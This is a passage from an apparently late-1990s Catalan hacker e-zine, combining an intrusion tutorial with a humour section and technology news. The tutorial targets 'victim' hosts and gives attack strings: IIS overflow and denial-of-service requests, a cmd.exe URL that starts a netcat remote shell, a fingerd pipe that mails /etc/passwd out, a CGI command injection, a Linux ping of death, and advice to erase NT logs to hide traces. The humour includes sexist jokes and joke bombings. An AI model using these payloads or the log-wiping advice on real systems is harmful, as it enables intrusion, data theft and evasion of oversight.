xarxa -no sempre-), a mes trobem encesses dues maquines mes, la 8 i la 23,
que podrien ser simples usuaris.
Aquest mètode ens sera molt útil per buscar més victimes dins del nostre
servidor, i que encara que el servidor estigui protegit potser alguna sub-
maquina no i podem fer alguna gracieta.
Currant desde dins...
~~~~~~~~~~~~~~~~~~~~~
Si el k voleu es coneixer millor la xarxa d'on treballeu o d'on estudieu, no
es dificil aconseguir la seva info. I no em valen escuses de que el wNT em
prohibeix fer-ho...res es impossible i si es NT esta tirat...primer hem de
saber quina seguretat té, si no en té (nomes login i punt) i podem executar-ho
tot no hi ha cap problema, si n'hi ha sera una mica mes dificil pero ho farem.
Primer anem a casa i agafem un disket i l'omplim amb els fitxers seguents de
windows95 (o w98 o wNT):
PING.EXE
ROUTE.EXE
TRACERT.EXE
(i si voleu algun "truyanu" tampoc estaria malament, pero si la maquina te
antivirus us el pot enganxar) :( -a mi em va pillar xD-
Be, doncs sera questió d'arrancar l'msdos (desde windowsNT) executar els
programes aixi:
ping www.victima.com >> ping.txt
ping ... >> ping.txt
i aixi anar fent amb el route
route print >> route.txt
i tracert
tracert www.victima.com >> tracert.txt
llavors haurem de llegir-nos els fitxer txt i ja estarà, pero ara em direu,
em tenen capat!! nomes puc utilitzar el Office, doncs ja esta! fes una macro
que executi un fitxer bat que ho faci tot i ja esta, la macro ha de ser aixi:
Dim pop
pop = shell("programeta.bat")
I si nomes podeu executar el navegador us podeu currar un html que executi el
fitxer quan s'obri o sino en sabeu tant que sigui un link.
Si el que tenim es una màquina unix (rar) podrem conseguir bastanta més info.
Per exemple amb el programa TOP podeu saber els programes que s'estan
executant, qui els executa i els recursos que es menja. També podeu mirar els
directoris compartits amb l'ordre: "showmount -e victima.com" i al costat del
directori veurem si està compartit o no. simple no?
Traçant...
~~~~~~~~~~
A mes no estaria malament saber quina ruta segueixen els paquets per arribar
al seu destí, per fer aixo haurem de fer: tracert o traceroute i possar la
ip/dns de la victima, i ell solet ens resoldra el problema, pero...si teniu
una conexio lenta, d'aquelles 4800baus tant meravelloses de la puta (T),
segurament se us menjara molts pasos (els finals normalment) dient que tarden
massa en respondre.. :((, haurem d'utilitzar un truc de SuperHacker (com el de
la guia xDDDD mongolics!) i ens llegirem l'ajuda de com funciona, probem amb
tracert -? i miracle! o sino traceroute --help (si es linux). I ho configurem
perque no pari fins que resolgui la ip. Facil no? doncs aixo ens servira per
saber quin router conecta la nostra victima a la xarxa i pim pam.
La solució es fer aixo:
tracert -w 666 www.victima.com
(poso 666 per possar algo, pero procureu k el numero sigui bastant alt, aixo
es el temps que s'espera a que el servidor respongui (si no respon)).
Ports:
~~~~~~
Ohhh! si no fos per ells no ser que fariem (no podriem navegar xD, que dolent)
si no sabeu que es un port, doncs us explico...un mitjo (socket) amb un nom
espera en un port a que algu el reclami per contestar i fer el que el dimoni
li digui (un dimoni es un programa encarregat de controlar els ports :), hi
han 65536 ports encara que nomes s'utilitzen uns quants (els primers 1000 son
els anomenats "registrats") ja que van ser els primers en utilitzar-se i estan
reservats per aquesta funcio. Potser els mes coneguts seran el 6667, 80, 21,
i para de contar, pero si sou mes 'experts' heu de coneixer (per pebrots) els
23, 25, 110, 22, 19, 79, i potser algun mes. Be, us podeu trobar una llista
d'ells a: /etc/services. o sino a windows a windows\services
0 [reservat]
1/tcp tcpmux tcp port service multiplexer
2/tcp compressnet Management utility
3/tcp compressnet Compression process
5/tcp rje Remote Job Entry
7/tcp-udp echo echo
9 null/discard Brosa
11 systat Informació sobre els usuaris
13 time/date Hora i data ;)
15 netstat Molta informació sobre la xarxa
15 b2-troyan troyan b2 (per sortir fer: "exit;") sense cometes.
17/tcp qotd Quote of the Day
19 chargen Antiportscan (char generator)
20 ftp-data
21 ftp FoTréPel
22/tcp ssh SSH Remote Login Protocol
23 telnet telnet i punt...
24 private mail any private mail system
25 smpt Enviar mail
27 nsw-fe NSW User System FE
29 msg-icp Message ICP
31 msg-auth Message Authentification
33 dsp Display Support Protocol
35 private printer Any private printer server
37 time Hora
38/tcp rap RouteAccessProtocol
39 rlp Localizació del recurs
41 graphics graphics
42/tcp name server HostName Server
43 whois Informació sobre la xarxa objetiu
44 mpm-flags MPM FLAGS protocol
45 mpm Message Processing Module [recv]
46 mpm-snd MPM [default send]
47 ni-ftp NI FTP
48 auditd Digital Audit Daemon
49/tcp tacacs LoginHostProtocol(TACACS)
50/tcp re-mail-ck RemoteMailCheckingProtocol
51 la-maint IMP Logical Adress Maintenance
52 XNS-time XNS Time Protocol
53 domain Nom de la màquina remota
54 xns-ch XNS Clearinghouse
55 isi-gl ISI Graphics Language
56 xns-auth XNS Authentication
57 mtp any private terminal access
58 xns-mail XNS Mail
59/tcp dcc server mIRC dcc server
61 ni-mail NI MAIL
62 acas ACA Services
63/tcp whois++ whois++ (bona definició :)
64 covia Communications Integrator (CI)
65 tacacs-ds TACACS-Database Service
66 sql*net Oracle SQL*NET
67/udp bootps Bootstrap Protocol server
68/udp bootpc Bootstrap Protocol Client
69/tcp tftp TrivialFileTransfer
70 gopher Buscador d'informació
71 netrjs-1 Remote Job Service
72 netrjs-2 Remote Job Service
73 netrjs-3 Remote Job Service
74 netrjs-4 Remote Job Service
75 any private dial out service (!!!)
76 deos Distributed External Object Store
77/tcp rje netrjs
78 vettcp vettcp
79 finger Molta info sobre els usuaris
80/tcp http/www WikiWikiWa (wib)
81 hosts2-ns HOSTS2 Name Server
82 xfer XFER Utility
83 mit-ml-dev MIT ML DEVICE
84 ctf Common Trace Facility
85 mit-ml-dev MIT ML DEVICE
86 mfcobol Micro Focus Cobol
87/tcp ttyplink any private terminal link
88/tcp kerberos Kerberos (un mail raro)
89 su-mit-tg SU/MIT telnet gateway
90 DNSIX Security Attribute Token Map
91 mit-dov MIT Dover Spooler
92 npp Network Printing Protocol
93 dcp Device Control Protocol
94 objcall Tivoli Object Dispatcher
95/tcp supdup SUPDUP
96 dixie DIXIE Protocol Specification
--
98/tcp linuxconf Added by RPM
101 hostnames sri-nick
102 iso-tsap
103 dictionary
104 x400
105 x400-snd
107 rtelnet Telnet remot (interessant)
109/tcp pop/pop2 PostOfficeProtocol-Version2 (POP!)
110 pop3 Rebre email Version3 (POP!)
111/tcp sunrpc/portmap SUN Remote Procedure Call
113/tcp auth Authentication Service
115/tcp sftp Simple File Transfer Protocol (npi)
117/tcp uucp-path UUCP Path Service
119/tcp nntp News (noticies)
123/udp ntp ntpd ntp
133/tcp statsrv Statistics Service
136/tcp profile PROFILE Naming System
137/tcp netbios-ns NETBIOSNameService
137/udp netbios-ns NETBIOSNameService
138/tcp netbios-dgm NETBIOSDatagramService
138/udp netbios-dgm NETBIOSDatagramService
139/tcp netbios-ssn NETBIOSSessionService
139/udp netbios-ssn NETBIOSSessionService (iaiaiaia!)
143/tcp imap InternetMessageAccessProtocol (bugs!)
144/tcp news NewS
153/udp sgmp Sgmp
158/tcp tcprepo repository (PCMAIL)
161/tcp snmp SNMP
162/udp snmp-trap
170/tcp print-srv Network Postcript
175/tcp vmnet
194/tcp irc InternetRelayChatProtocol
213/tcp ipx IPX
220/tcp imap3 InteractiveMailAccessProtocolv3
315/udp load
400/tcp vmnet0
443/tcp shttp Un altre servei wib, molt poc utilitzat
500/udp sytek
512/udp biff/exec Indica als usuarios que han rebut mail
513/tcp rlogin remote login (interessant)
513/udp who Info sobre l'arranc de la màquina
514/tcp shell Shell remota
514/udp syslog Logs del sistema
515/tcp printer spooler (impressora!)
517/udp talk talk (de unix) (talk root)
518/udp ntalk
520/udp route Routing (router routed)
525/udp timed Time Server
526/tcp tempo NewDate
529/tcp irc-serv IRC-SERV
530/tcp courier rpc
531/tcp conference chat
532/tcp netnews
533/udp netwall emergency broadcast
540/tcp uucp
543/tcp klogin Kerberos login
544/tcp kshell Remote Shell
550/udp new-rwho [ experimentat ]
556/tcp remotefs Brunhoff remote filesystem
560/udp rmonitor [ experimental ]
561/udp monitor [ experimental ]
600/tcp garcon
601/tcp maitrd
602/tcp busboy
635/udp mount
640/udp pcnfs
650/udp bwnfs
700/udp acctmaster
701/udp acctslave
702/udp acct
703/udp acctlogin
704/udp acctprinter
704/udp elcsd errlog
705/udp acctinfo
706/udp acctslave2
707/udp acctdisk
749/tcp kerberos-adm Kerberos Admin
750/tcp kerberos Kdc ( Kerberos authentication--tcp)
750/udp kerberos kdc ( Kerberos authentication--udp)
751/tcp kerberos_master Kerberos authentication
751/udp kerberos_master Kerberos authentication
752/udp passwd_server Kerberos passwd server
753/udp userreg_server Kerberos userreg server
754/tcp krb_prop Kerberos slave propagation
888/tcp erlogin Login and environment passing
1109/tcp kpop Pop with Kerberos
1025/tcp listen listener - remotefilesharing
1026/tcp nterm Remote login (!!!!!)
1167/udp phone
1524/tcp ingreslock
1600/tcp tnet transputer net daemon
1666/udp maze
2003/tcp cfinger CGU finger
2049/udp nfs Network File System (sun nfs)
2053/tcp knetd Kerberos de-multiplexor
2105/tcp eklogin Kerberos encrypted rlogin
4444/tcp krb524 Kerberos 5 to 4 ticket xlator
5000 commplex-main
5555/tcp rmt rmtd (RMT Daemon)
5556/tcp mtb mtbd (backup)
5742/tcp wincrash wincrash troyan
6667/tcp irc irc
7000/tcp dos msdos
9090 websm
9535 man remote man server (manual)
9536/tcp w npi (???)
9537/tcp mantst remote man server, testing
10000/tcp bnews
10000/udp rscs0
10001/tcp queue
10001/udp rscs1
10002/tcp poker
10002/udp 10rscs2
10003/udp rscs3
10003/tcp Gateway
10004/tcp remp
10004/udp rscs4
10005/udp rscs5
10006/udp rscs6
10007/udp rscs7
10008/udp rscs8
10009/udp rscs9
10010/udp rscsa
10011/udp rscsb
10012 qmaster
31337/tcp boserve BackOrifice!! (i no BackOffice :) (default)
* Si em falta algun port m'ho dieu a poptph@hotmail.com i ho canviaré quan pugui.
Però, com podem saber quins ports te oberts la maquina victima? doncs facil,
sera questio d'agafar un portscan i executar-lo (`pscan' per linux, o 7th
Sphere per windows, encara q si teniu algun millor l'utilitzeu, SIUSPLAU NO
FEU SERVIR EL HAKTEK Q SEMBLA UN ALBUM DE FOTOS FAMILIAR I FA MOLTA GRIMA!!!
un cop dit aixo ja sabrem quins ports te oberts (nota: els portscans acostumen
a utilitzar mes d'un mitjo (socket) per accelerar el proces o sigui que no us
extranyeu si de cop i volta no podeu accedir a cap pagina ni fer telnet a res.
Si el portscan es bo, ens donara la versio del dimoni que controla el port, i
si no doncs haurem de fer telnet a tots els ports oberts de la maquina per
saber la seva versio.
Basicament ens haurem de fixar en les versions de l'ftp (ultimament estan
sortint molts exploits per elles), el de telnet (que ara acostumen a prohibir
l'acces remot de roots (linux rh6) i no podrem accedir com a roots a no ser
que hi hagi algun fallo de seguretat), i del finger, les altres no son tant
importants, pero, si voleu enviar emails anonims fixeu-vos amb l'smtp (que
hi han molts de rars), i el pop si es que te algun fallo i sou unes marujes.
Aquesta informacio ens pot ser de molta utilitat ja que gracies a ella podrem
buscar els eXploits per aprofitar-nos dels seus bugs i conseguir una arrel
(root) xD la cosa mes preciada aqui. (es curios: mitjons, arrels...jeje) a
mes no estaria de mes estar ficat dins d'alguna llista de bugs sobre el que
busquem (ntbugtraq pexemple), ja que ens podrem enterar de molts fallos abans
que els administradors ho sapiguem i actualitzin el dimoni.
Algunes pagines on podrem trobar bugs son:
www.rootshell.com
www.techonotronic.com
www.securityfocus.com
www.bugtraq.com
oliver.efri.hr/~crv/security/bugs/list.html
WHOIS:
~~~~~~
Gràcies a aquest servei linkat al port 43 podem conseguir informació sobre
qualsevol sistema, les seves IPs, companyies implicades, IPs, emails, pais,
etc.. pero per aixo haurem de telnetar a una dels següents servidors, que
es dediquen a organitzar tota aquesta inof (internic)
whois.ripe.net
nic.ddl.mil
rs.internic.net
whois.apnic.net
whois.arin.net
whois.internic.net
Per cert... us recomano el primer.
QueSo?
~~~~~~
Formatge, de bola, amb xoriço...el queso (formatge a partir d'ara) es un
programa fet pels Apostols i ara em sembla que l'han adaptat a una cgi:
que està a: http://www.netcraft.com/whats , aquest programeta el que fa es
examinar el servidor que li dius i li fa diverses probes per comprovar quin
sistema operatiu utilitza, cosa molt util per saber contra qui ens enfrontem,
majoritariament ens trobarem Unix, pero ara estan sorgint bastants wNT (quan
no donen ni la meitat de serveis que els altres) i a mes venen amb el pack
de DoS instal.lat xD, per cert, ara que estic parlant de NT, us dono uns
quants bugs que te el Service Pack 3 (IIS3) i alguns del 4:
Llegir fitxer de passwords alternatiu (molt poc efectiu):
www.victima.com/scripts/pass.txt%20.pl
Provoca un DoS (Denial of Service) i penja el servidor.
www.victima.com/?pop=xxxxxxxxxxxxxxxxxxxx(moltllarg)
Provoca un error i podrem llegir la ram:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(moltllarg)
Penjar el servidor ftp
quote nlst AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(moltllarg)
El mateix d'abans per ftp.
login anonymous
passw pop@pop
port 1,1,1,1,122,105
quote nlst AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(molt llarg)
Crear un fitxer evil.html en el directori arrel (tot junt)
http://vulnerable.site.com/scripts/tools/newdsn.exe?driver=
Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+
samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.
html&newdb=CREATE_DB&attr=
Penjem el servidor (retina):
GET /AAAAAAAAA(moltllarg).htr HTTP/1.0
Penjem el servidor (retina)
GET / HTTP/1.1
Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(200bytes)
Amb aixo podeu executar ordres remotament (pero han de tindre cgi-bin i l'NT
acostuma a utilitzar el directori script) (els espais amb %20), despres
podràs fer telnet al port 10000 com si fos un "Simbolo de ms2" o un BO xD
http://www.servidor.com/cgi-bin/cmd.exe?/c cgi-bin\nc.exe -L -p 10000 -t -e cmd.exe
Per obrir-vos una conta al servidor existeix el bug següent:
www.servidor.com/cgi-bin/getadmin.exe?iusr_hostname
(on substituïu iusr i hostname pel que volgueu com: croqueta_poma)
CGI
~~~
Les cgi, son petits programes escrits en java que nomes els pot executar el
servidor i que nosaltres nomes rebem la resposta que ens dona. I estan en
directoris protegits pel dimoni httpd (el de web 80), i per tant no els podem
aconseguir a no ser que tingui algun bug i ens poguem aprofitar. Si per
casualitat conseguissim l'arrel (root) i ens baixem aquests fitxers els podrem
descompilar amb un programeta molt guapo que es diu `decafe' que retorna el
codi binari java al seu codi font en molta precissio i aixi de pas podrem
estudiar el codi i buscar fallos de seguretat. Per cert, aquestes cgi les
podem trobar dins del directori /cgi-bin/ si corra amb unix o dintre del
directori de /scripts/ si va amb wNT.
Un cgi que ens pot ser util es de finger, que substitueix el port 79, i que
sempre que no tinguin el port 79 obert podrem comprovar si esta el root aixi:
desde el navegador:
www.victima.com/cgi-bin/finger?root
be, basicament, despres de l'interrogant podem ficar qualsevol nom
d'usuari i ens dira la seva informacio. A mes, si teniu molta sort
potser trobeu un servidor d'aquells antics que tenen el phf fotut i
tot! i podeu aprofitar un bug que tenia el finger que ens enviava el
el fitxer de passwords directament al nostre email aixi:
desde el port 79:
usuari | /bin/mail elmeu@mail < /etc/passwd
I si rula tambe podeu probar altres fitxers (com pot ser el
/etc/shadow (si es que tenen els passwords sombrejats) o executar
programes remotament, tambe, suposo que si pots executar aixo, tambe
podras executar-ne d'altres (com l'ls, el cat, el adduser o el passwd
que sempre son practics per conseguir acces a la maquina). Exactament,
aquest bug es trobava en el dimoni fingerd antic i no te res a veure
amb el cgi, pero que no sigui per no probar.
Pot ser interessant fer un finger als usuaris @, ftp, root, bin,
system, Guest, anonymous, etc... aixi sabrem si estan conectats, a
vegades (com a sephora) ens donen els usuaris actius en la màquina,
pero penseu que es pot accedir a una màquina i no sortir llistat
al finger! (per fer-ho s'ha d'accedir fent amb linux:
rsh victima.com csh -i
Un altre bug resideix en el cgi anomenat `handler' que gracies a ell podrem
conseguir executar programes remotament (per variar un rato), per fer-lo
rular haurem de fer telnet al port 80 i escriure:
GET /cgi-bin/handler/pop.pop;cat /etc/passwd|?data=Download
Per cert, em sembla que l'espai entre cat i /etc/passwd es feia amb
un %20 , i tampoc se segur que es pugui fer rular desde un navegador
(se suposa que si) pero no he trobat cap handler foradat per
probar-ho.
<POPNOTE> Si conseguiu accedir a una màquina NT seria bó que borressiu les
vostres petjades (o les modifiquessiu (per fer la gràcia)), aixo ho podeu
fer accedint al directori i modificar/borrar/crear els fitxers log d'aqui.
c:\winnt\system\logfiles\*.log
Pot ser molt interessant aconseguir algun programa que escanegi i busqui
errors de seguretat en una màquina, com pot ser el SATAN o el NESUS.
NOTA: Desde el meu punt de vista veig un futur a la xarxa dominat per la web,
i com que les empreses i demes volen seguretat tancaran els altres ports, i
nomes podrem hackejar desde cgi i tal, cosa molt dificil d'aconseguir si no
estem ben informats, potser properament escriure un article sobre els ultims
bugs dels cgi i el possare a la revista pero fins llavors, espavileu-vos.
Salut i Lluita!
> POP
==============================================================================
##############################################################################
Truita.De.Patates.Amb.Un.Bistec.Suculent.Acompanyat.De.Turr¢.I.Canelons.Verds?
##############################################################################
==============================================================================
[09]
-------[ Humor ]--------------------------------------------------------------
Estrenem una secció nova!! L'humor, el caxondeo padre!, hem fet una recopila-
ció de diverses fonts (basicament el mail i els amics) i aqui us presentem el
que és, una mica de descans sempre va bé, i de pas us inviteu a que colaboreu
en la secció enviant.
Sí, a CatHack encetem una nova secció. Per què, qui diu que els hackers són
gent estranya que només parlen d'informàtica? No, els hackers tenim també un
petit espai per l'humor, per la festa i l'alegria, pel vi i les patates i la
cerveseta i les olivetes. Algú s'ha atrevit a dir-vos que sou rars per que el
dia d'any nou dineu els canelons a l'aula d'informàtica, davant l'ordinador?
Algú s'ha atrevit a dir-vos que sou rars per que, dins la vostre colla heu
començat a parlar sols i se us ha escapat alguna frase de l'estil 'mknod
/tmp/my_dev b 3 2' o 'if (argc > 1) offset += strtol(argv[1], NULL, 0)' ?
Doncs sorpreneu-los explicant un fabulós acudit. A aquesta secció trobareu,
periòdicament, uns quants. També podeu enviar els vostres acudits i, prèvia
valoració, els publicarem. Entre els millors acudits es sortejarà un CD amb
el sistema operatiu Red Hat 6.0.
Que tenen de comú les dones i els servidores web ?
400 Bad Request Diga'm-ho amb flors
401 Unathorized Estic casada
402 Payment Required Són 10.000 i al llit
403 Forbidden/Access Required ZZZZZZZAS! (bufetada)
404 Not Found He quedat amb les amigues
405 Method Not Allowed No, per darrera no...
406 Method Not Acceptable ... i per la boca menys
407 Proxy Auth. Required Ho parlaré amb la meva mare
408 Request Timeout Saps quant fa que no em truques?
409 Conflict Qui era AQUELLA?
410 Document Removed Vull el D-I-V-O-R-C-I
411 Lenght Required A això li dius "tros de polla"?
412 Precondition Failed Que no has portat condons?
413 Request Entity Too Large Això no em cabrà ahí dintre
414 Request URL Too Large Això tampoc no em cabrà ahí dintre
415 Unsupported Media Type A quatre potes no m'agrada
500 Internal Server Error Tinc la regla
501 Not Implemented Mai no faria *això*
502 Bad Gateway ... i per ahí, menys encara
503 Service Unavailable Em fa mal el cap
504 Gateway Timeout Ja està?
Autor: anònim
Traducció al català: Àlex Castán
-----------
BON NADAL!
No ets bó, mai ho has volgut ser. aquestes dates et deprimeixen, tanta
benevolència t'omple, afina ta visió cínica de la vida. No et procupis,
no ets l'unic. Som molts els que pensem com tu. Junts seguint aquests
petits consells, podrem fer-lo possible.
L'ANLTRE NADAL.
1.- Envolta el teu pesebre amb filferro d'espines per reproduïr fidelment
el paisatge de la Palestina actual. Organitza una antifada amb els pastorets
contra "aquells" colons jueus que s'han instal.lat en el pesebre. Envia un
àngel per convocar una conferència de pau. El dia anteior, fes estallar un
cotxe bomba en el centre de l'enunciata.
2.- Acudeix a uns grans magatzems i apropante a totes les parelles amb fill
que trobis. Exigeix certa quantitat de diners a canvi de no explicar-li al
seu fill tota la veritat de Santa Claus. Amb els diners recollits mitjançant
l'impost revolucionari, compra't una disfressa de Pare Noel lepros i planta
mines antipersona al recorregut de la cabalgada dels reis mags.
3.- Evita veure la marató solidària que totes les tv organitzen per aquestes
dates. En comptes d'aixo, apropa't al videoclub i lloga una pelicula com:
"La maledicció de Damien", "El dia de la bestia" o la sèrie completa de
"Posesió infernal".
4.- En comptes de la coneguda estrella, coloca en el teu pesebre un meteorit
sorit d'orbita que colisionarà contra la Terra el dia 24 de decembre, a les
23 hores i 58 minuts.
5.- Vols guanyar la rifa de nadal? No compris cap número i obtindràs el
premi directe de 3000petes. A tot aquell que t'ofereixi una participació
mira'l amb despreci i obreli els ulls explicant-li les poques probabilitats
que existeixen que el seu nombre surti guanyador, amen dels impostos de
l'estat recauda amb la rifa i els perills de convertir-se en un perillós
ludòpata.
6.- Envia una targeta de nadal a tots els teus familiars i coneguts. En
lloc del tòpic "Bon Nadal i Feliç any nou" escriu els teus veritables
desitjos. El pròxim nadal t'estalviaràs un dineral en segells.
7.- Cambia la lletra de les teves nadales preferides. Per exemple: "Moren i
moren els peixos en el riu, pero mira com moren, pels residus radioactius".
O bé: "Aquesta nit es nitbona i demà nadal, i l'altre amb resaca m'en torno
a treballar".
8.- Tira els envoltoris dels regals i les ampolles de cava directament a
les escombraries. Els teus residus el perteneixen i pots fer amb ells el
que vulguis, l'Ajuntament no té dret a recaudar fons gràcies als teus
desperdicis amb el pretexte de reciclar-los.
9.- Denuncia al rei Baltasar i assegura't que li apliquin la llei
d'extrangeria. (la nova) :(
10.- Empapa l'arble de nadal amb salfumant diluït amb aigua al 10%, Per
que no trobi a faltar la pluja àcida dels boscos d'on procedeix. Amb les
llumetes, provoca un incendi forestal. Després rectifica els terrenys
(sobornant a alguns polítics i funcionaris) i construeix, construeix...
11.- Fuig del consumisme. Viatja a algun pais exòtic i disfruta per tot lo
alt d'unes merescudes vacances en un hotel de luxe.
12.- Proclama la República en el teu pesebre. Fabrica una guillotina amb el
ganivet de tallar pernil (al preu que va el pernil, per una altre cosa ja
no serveix) i decapita cada dia a un rei Mag. O bé organitza una pinya
d'execució amb els Power Rangers del teu cosí. Confisca les ovelles als
pastors i desploma l'angel. Construeix esglèsies i després cremeles!.
13.- Un cop destronada la monarquia, convoca unes eleccions per que els
teus fills escullin lliurement a tres Presidents de República Mags. Fes-lis
promeses electorals perquè el dia 6 de gener que naturalment no penses
complir. Instrueix-los en la Democràcia.
Autor: Solidaridad Obrera http://www.nodo50.org/sobrera/ - sobrera@nodo50.org
Traducció: Un pop... Pop.tPH
==============================================================================
··············································································
Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi! Oi!
··············································································
==============================================================================
[0A]
(((((((())))))))
(( ))
(( NOTICIES ))
(( ))
(((((((())))))))
virus-2000-farmàcia:
Un informàtic de madrid cabrejat per l'acomiadament de la seva feina
(una farmàcia) va ficar un virus en els ordinadors que borrava totes
les factures quan s'arrancava un ordinador el dia 1 de gener del 2000.
El van enganxar quan estaven fent proves sobre el efecte 2000.
Internet Via Satel·lit:
Per fi arriba inet via satel.lit!! Per poder-se conectar s'utilitza el
modem normal per enviar dades al servidor (poca velocitat) pero per
rebre es fa a traves d'una antena parabòlica i una targeta especial
(30.000 petes) que permet rebre informació a 400Kbps!!!, La tarifa
d'aquest servei es de 3000petes/mes, no dono noms d'empreses per no
fer popaganda, si us interessa envieu un mail a poptph@hotmail.com i
us ho direm.
Microsoft fa neveres!!:
Si, no té prou en timar-nos amb programes que ara es dedica a fer
neveres amb conexió a internet, w98 i pantalla tàctil. on arribarem???
Rentadores controlades desde mòbil:
Seguint la penosa linea de la M$ una empresa de rentadores ha decidit
fer rentadores programables desde mòbil. Que cutre!
La piratería en Expaña supera el 57 per cent
Segons dades la BaSurA (BSA) , el 57 per cent del software
que es distribueix a Expaña es ilegal!!! JAJAJAJAJA
Seguiu així pirates.. :) fins que no baixin els preus no pararem!
El domini .eu ja és a la venda
Tot i que la Comissió Europea no ha donat el vist i plau
a la utilització del domini .eu, ja es pot comprar a una
pàgina editada per l'empresa anglesa IDR.
Intel anuncia el llançament del chip "Coppermie" a 750 i 800Mhz, la
ultima versió del Pentium III, permetent d'aquesta manera tenir una
victoria momentàniaen la cursa amb AMD per veure qui consegueix
avans arribar a 1 Ghz de velocitat
de rellotge.
Ja veurem qui guanyarà!!! :-)
Multa pel 1900:
Un paio de barna ha rebut 500 multes de trafic a pagar l'any 1900.
Comença la diversió! xDD
GSM petat:
Dos criptògrafs israelins han petat el sistema d'encriptació GSM (A5/1)
i diuen que es poden punxar en menys d'un segon.
-més info a:
Cell Phone Crypto Penetrated
http://wired.lycos.com/news/politics/0,1283,32900,00.html
Desarrolladores israelíes descodifican GSM
http://beta.ibrujula.com/news/noticia.php3?id=138
Two say they cracked A5/1 encryption code
http://www.sjmercury.com/svtech/news/breaking/merc/docs/code120799.htm
Researchers claim GSM cell phones insecure
http://www.computerworld.com/home/news.nsf/all/9912105gsm
Clinton demana als hackers que no facin res
fins al final de l'"Efecte 2000"
L'especialista en problemes de l'any 2000 del
President Bill Clinton ha demanat a la comunitat
hacker que contingui les seves activitats fins que passi
el temut període del cap setmana del mil·lenni.
Mireia Cortès ( Mireia@noticias.com ) - En el que es una
demanda bastant inusual, John Koskiken, chairman del
consell presidencial per la conversió a l'any 2000 ha dit que
molta gent veu el entrar en les xarxes de seguretat com
"un gran servei públic" perquè atreu la atenció sobre les
errades informàtiques.
"Però espero que aquestes persones es donin compta de
que tindrem suficients coses de les que preocupar-nos en
aquell cap de setmana de capa d'any, amb el que no és un
període especialment bo per demostrar les errades
informàtiques", va comentar recentment Koskiken. "Si volen
demostrar aquestes coses, no els hi ve d'un cap de
setmana".
Una de les majors preocupacions de les autoritats és la
confusió durant el canvi de segle que podria amagar altres
tipus d'activitats d'un caràcter més malicioses, incloent
atacs informàtics de nacions hostils.
El FBI parla sobre les "histories de hackers"
Encara que de vegades sembli que les coses estiguin
calmades, en realitat les noticies sobre les invasions
informàtiques de grups de hackers es solen succeir molt
sovint. Algunes d'aquestes noticies s'han fet públiques com
"anècdotes" per part del FBI, que vol serveixin per donar
exemple a la població.
Mireia Cortès ( Mireia@noticias.com ) - Un grup de hackers
anomenats els "Phonomasters", per exemple , van robar milers de
números de targetes telefòniques i van trucar a línies privades de
la Casa Blanca, entrant en els sistemes de seguretat del FBI a
mitjans dels 90s.
Alguns anys després de que el FBI neutralitzes el grup, els últims
dels líders esperen sentència davant el jutjat. Jonathon Bosanac
es va declarar culpable de dues de les acusacions de frau
informàtic la setmana passada. El autoproclamat "Gatsby" es pera
sentencia el 2 de març.
Altres coneguts pirates van ser sentenciats en setembre. Corey
Lindsley "Tabbas" es va enfrontar a 41 mesos de presó, mentre
que Calvin Cantrell "Zibbi" tindrà 24 mesos. El rang d eles seves
activitats era òptim, podien escoltar trucades telefòniques,
modificar bases de dades segures i entrar a ordinadors de
sistemes de seguretat, inclòs els del FBI.
Mirant en les bases de dades confidencials, van advertir als
objectius del FBI de que les seves línies estaven sent vigilades,
però mai van comprovar i les seves ho estaven. Feien servir grans
mesures de seguretat per evitar que els detectessin. En les
trucades de llarga distància mai feien servir els seus noms reals i
parlaven en codi.
Però sempre estaven alerta de perill, com demostra un
transcripció d'una conversació telefònica, en la que Bosanac
escolta un estrany soroll en la línia:
"Que ha passat? Deu ser el FBI", riu Cantrell. "Si que sonarà irònic
quan escoltem aquestes cintes en el jutjat", va comentar Lindsley.
El FBI estava escoltant, amb un prototip de dispositiu de 70.000
dòlars que guardava cada paraula i tecla que és pitgés en una
línia telefònica.
Dijous, 16 de Desembre de 1999
Bug en els sistemes linux 2.0.x:
Fent ping -s 65468 -R ANYIPADDRESS (on anayipadress es una ip de un
servidor de linux 2.0.x provoca que el servidor reinicii).
(com el Deathping del win, sempre la caguen)
Més anonimitat:
L'empresa Zero-Knowledge presentarà aviat una utilitat que permetrà
amagar la seva identitat, sota una limitacio de 10.000 vendes setmamals.
http://www.freedom.net/
SoftCatalà presenta la seva ultima versió del WinRar (www.sofcatala.org)
Un microxip podria permetre, en la pròxima dècada, que els cecs hi veiessin
http://www.noticies.com/noticies/1999/9912/n9912133.htm
El xip de silici es limitarà d'aqui uns 10 anys, per llavors ja
s'està preparant els xips moleculars, desenvolupat per científics d'EEUU,
canviant els interruptors lògics per molècules de rotaxonà del tamany d'un
nanòmetre. Aquest xip desenvolupat en part per HP (hewlett packard i no
hijoputas ;) està previst treures prop del 2014, emetrà menys calor, serà
més ràpid i més facil i barat de fabricar.
Fisics d'Alemania consegueixen memòries RAM resistents a les apagades de llum.
Proxima era del comerç electrònic:
Es prepara la proxima epoca de ERP (el sistema de comerç electronic
actual), més info a: www.mysap.com www.oracle.com www.intentia.com
IBM i NASA preparen uns ordinadors de 10.000 de xip capaços de realitzar
10.000 billons d'operacions per segon. S'empraràn per estudiar les
proteïnes i el codi genètic.
Una empresa eXpanyola crea una targeta de prepagament en la xarxa: Cybermoola
(mola no?xD) www.cybermoola.com
Deutche Bank la caga en el 2000.
A 25 dies de la fi del mileni, Deutche Bank va sofrir una caiguda dels
seus sistemes durant les proves del efecte2000 (Y2K (rabiós nom)).
LMDS: L'ultima esperança contra Telefonica
Pels voltants del 2000 apareixera la tecnologia LMDS o WLL (wireless
local loop), que substituira les linies telefoniques per emisors/
receptors de radio a 3.5 / 26GHz (encara esta per determinar), situats
en repetidors al damunt de cada pis amb repetidors.
Les empreses implicades tenen l'obligacio d'instal.lar aquests serveis
en les ciutats eXpanyoles de mes de 200.000habitants en menys d'un
any. - Aquestes companyies oferiran serveis amb una tarificacio
d'un 65% mes barates.
Les empreses implicades en el tema son:
-3.5GHz
Telefonica :(((
Airtel
Alo2000
Sky Point
AbraNet
Milenio
-26GHz
